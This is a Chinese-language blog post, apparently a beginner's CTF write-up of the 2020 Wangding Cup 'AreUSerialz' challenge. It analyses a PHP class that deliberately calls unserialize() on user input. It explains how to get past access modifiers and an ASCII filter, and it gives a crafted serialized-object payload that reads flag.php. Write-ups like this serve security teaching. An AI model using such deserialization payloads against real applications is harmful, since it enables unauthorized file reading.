[网鼎杯 2020 青龙组]AreUSerialz 1

最新推荐文章于 2024-07-16 09:28:46 发布
最新推荐文章于 2024-07-16 09:28:46 发布
阅读量22 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BbbLll12138/article/details/134726017
版权

啪一下,一坨代码扔给我,很快凹!

首先是包含了flag.php文件

include("flag.php");

然后就是 一个php语法高亮显示,没啥用跳过。

highlight_file(__FILE__);

紧接着就是一个class类的定义

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

这么一大堆讲了啥,再看看。

先是整了PHP的访问修饰符,插入知识点。

类属性可以定义为public, private 或者 protected。在没有任何访问控制关键字的情况下,属性声明为 public。

**public**:公共

**protected**:受保护,只有当前类成员和继承该类的类才能使用

绕过方法:%00类名%00成员名

**private**:私有,只有自己才能访问

绕过方法:%00%00成员名

 下面构造了函数

function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

初始化加调用process(),process在哪呢?下面

public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

如果op=1,执行写,op=2,执行读,不然就是坏黑客!

下面是写的内容

private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

知识点插入 

isset()用来检测变量是否设置

strlen()用来检测变量长度 

满足content小于100即可绕过。

下面的自定义read函数和output函数用处较为明显,略过不表。

来不及悼念read和output,接下来登场的是重量级,destruct函数

function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

_destruct()当一个对象或对象操作终止时被调用

这里的if判断使用了三个等号,是强比较,插入知识点

强比较:===

比较值,也比较类型

例如:"123a"===123=>false

弱比较:==

弱比较主要是字符型和数字型的比较

1.字符型和字符型,数字型和数字型,同类型比较值。

2.字符型和数字型比较

        若字符型值开头为数字,转为数字;

        若开头不为数字,为null弱比较与0相等。

例如:"a123"==123=>false

           "abc123"==0=>true

           "123a"==123=>true     

3.布尔值true和任意字符串和数值比较,除了false和0,都为true。因为0在布尔值中是false,true和false不等。

 这里可以写的是,如果op===2就强行赋值1,然后content变成空,调用process。

然后来到了is_valid函数

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

插入知识点

ord函数用来返回ascii值

这个函数来检测我们传入的每个字母在32和125之间

最后就是一个get传参,传到is_valid里检测,true就反序列化str

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

全部代码读完了,来看看解法吧。

首先要给op赋值数字2,我们需要进入read,然后把res输出出来,

接着是filename,题目里给了是flag.php

最后就是通过get传参,把我们构造的序列化payload传进去。

序列化代码

<?php

class FileHandler{

        public $op = 2;
        public $filename = "flag.php";
        public $content = "1";

}
$a = new FileHandler;
$b = serialize($a);
echo $b;

?>

找个菜鸟教程的在线编译器丢进去吧。

序列化后

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:1:"1";}

 注意,这里使用的是public公共对象,因为protected对象在序列化之后是由%00*%00字符,而这个%00*%00的ASCII码为0,是不能通过is_valid()的检测的,所以要转换成公共对象,因为在php7.1+版本对类型不敏感,所以改成public就可以顺利绕过。

把这序列化后的构造成payload

?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:1:"1";}

再查看源码

便得到了flag。

第一次写wp,感觉有很多不对,我刷ctfweb题的时候,感觉很多知识看过就忘了,很多师傅写的wp很好,但是记不住没用啊,所以我想着能不能自己试着写写wp,然后来帮助自己记住知识点,希望师傅看到不对的指正一下,谢谢!

吧啦不吧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网鼎杯 2020 青龙]AreUSerialz 1参考解析
weixin_52003758的博客
01-28 3042
进入题目,便是php的代码 这是一个代码审计题目(序列化和反序列化) 【注】在代码中我已经给出了部分的注释 <?php // 文件包含 include("flag.php"); highlight_file(__FILE__); // 阐述FileHandler类 class FileHandler { protected $op; protected $filename; protected $content; // 构造函数,将op filename c
[网鼎杯 2020 青龙]AreUSerialz1
陈艺秋的博客
07-05 682
如果 $str 经过 is_valid() 函数的检查,返回 true,则使用 unserialize() 函数对 $str 进行反序列化操作,并将结果赋值给变量 $obj。op,filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验。则将 $op 的值修改为 "1",并清空 $content,然后再次调用 process() 方法。
2020网鼎杯青龙web AreUSerialz详解
永远是少年
12-20 723
今天继续给大家介绍CTF刷题,本文主要内容是2020网鼎杯青龙web AreUSerialz详解。 一、题目简介 二、PHP代码分析 三、解题实战
【web | CTF】BUUCTF [网鼎杯 2020 青龙]AreUSerialz
weixin_46301214的博客
02-17 865
改动2:在op前面增加\00*\00,因为私有属性是会自带 * 号,需要用\00来截断(原理不清楚)先看进来入口的逻辑,判断是不是正常的ascii码字符,然后反序列化,可以忽略校验,都是正常的。看了一下只有读文件函数是有用的,那就要 $op=2 或者$op='2' 才行。奇怪的地方:$op是整数2,不能是字符串的2,很奇怪,明明字符串的2也可以啊。天命:这题也是有点奇怪的,明明用字符串2也应该是可以,但偏偏就不行,神奇了。天命:php的序列化题目简直是玄学,既不能本地复现,也不能求证靶场环境。
BUUCTF [网鼎杯 2020 青龙]AreUSerialz1
weixin_74410605的博客
08-20 343
得到O:11:"FileHandler":3:{s:2:"op";通过认真看代码及理解代码,根据op=2且filename=flag.php写出相应的反序列化代码构造payload即可得出flag。接着ctrl+u查看源码即可得到flag。
BUUCTF [网鼎杯 2020 青龙]AreUSerialz 1 (两种解法 超详细!)
m0_73734159的博客
11-27 1599
*include() ** 包含函数 ** ****is_valid() ** 检查对象变量是否已经实例化,即实例变量的值是否是个有效的对象。**file_get_contents() ** 函数把整个文件读入一个字符串中。**file_put_contents() **函数把一个字符串写入文件中。
[网鼎杯 2020 青龙]AreUSerialz1详解两种常用方法及php伪协议扩展
m0_73615178的博客
01-21 564
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
BUUCTF [网鼎杯 2020 青龙]AreUSerialz
m0_49025459的博客
05-02 689
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() {//魔术字符 $op = "1"; $filename = "/tmp/tmpfile"; $content.
buuctf - [网鼎杯 2020 青龙]AreUSerialz
qq_40860153的博客
10-11 2551
1.题目源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content
2020网鼎杯青龙Boom
05-12
【标题】"2020网鼎杯青龙Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
20200510.网鼎杯青龙.zip
06-10
2020 5 10 网鼎杯 青龙 比赛题目 web没有附件 其他基本都有 , 感谢各位师傅的整理
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8339
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ns3-gym入门(二):linear-mesh例子详解
zoe2222226666的博客
07-15 894
学习ns3-gym中关于IEEE 802.11网状网络中控制随机接入的例子linear-mesh
【框架】PHP框架详解-symfony框架
最新发布
Xiaoxin的博客
07-16 828
1. 起源与开发者Symfony由SensioLabs(现为Symfony公司)开发,最初由Fabien Potencier于2005年创建。Symfony框架自发布以来,经历了多个版本的迭代,每个版本都引入了新的特性和改进,以满足不断变化的Web开发需求。2. 设计理念Symfony框架遵循MVC(Model-View-Controller)设计模式,将应用程序分为模型、视图和控制器三个核心部分,有助于实现代码的分离和重用。
喰星云·数字化餐饮服务系统 多处 SQL注入漏洞复现
0xSec
07-14 488
喰星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
陇剑杯线下网络防御wp
10-06
陇剑杯线下网络防御wp是一项网络安全竞赛,旨在培养和提升网络安全人才的技术能力和实战经验。该比赛由陇剑网络实验室主办,参赛者需要通过线下实战模拟来解决实际的网络攻防问题。 该比赛的wp,即“Write-up”,是指参赛者解决问题的详细描述和解决方案的记录。陇剑杯线下网络防御wp是参赛者通过分析和解决比赛中遇到的各种问题所编写的一份报告。 在这份报告中,参赛者将详细描述他们分析问题的过程,包括发现问题、理解问题的关键因素和属性,以及提供解决问题的方法和策略等等。此外,参赛者还会展示他们的技术实施步骤和使用的工具,以及解决问题的效果和成果。 陇剑杯线下网络防御wp的目的是让参赛者在比赛结束后,能够总结和分享自己的经验和思路,从而促进知识和经验的传播与交流。同时,通过编写wp,参赛者也能够提高自己的技术文档写作能力和表达能力。 总之,陇剑杯线下网络防御wp是参赛者在比赛后所编写的一份报告,用来详细描述他们的问题解决过程和解决方案,以及展示他们的技术实施步骤和成果。通过编写wp,参赛者能够总结经验、分享技巧,并提高自己的技术文档撰写和表达能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值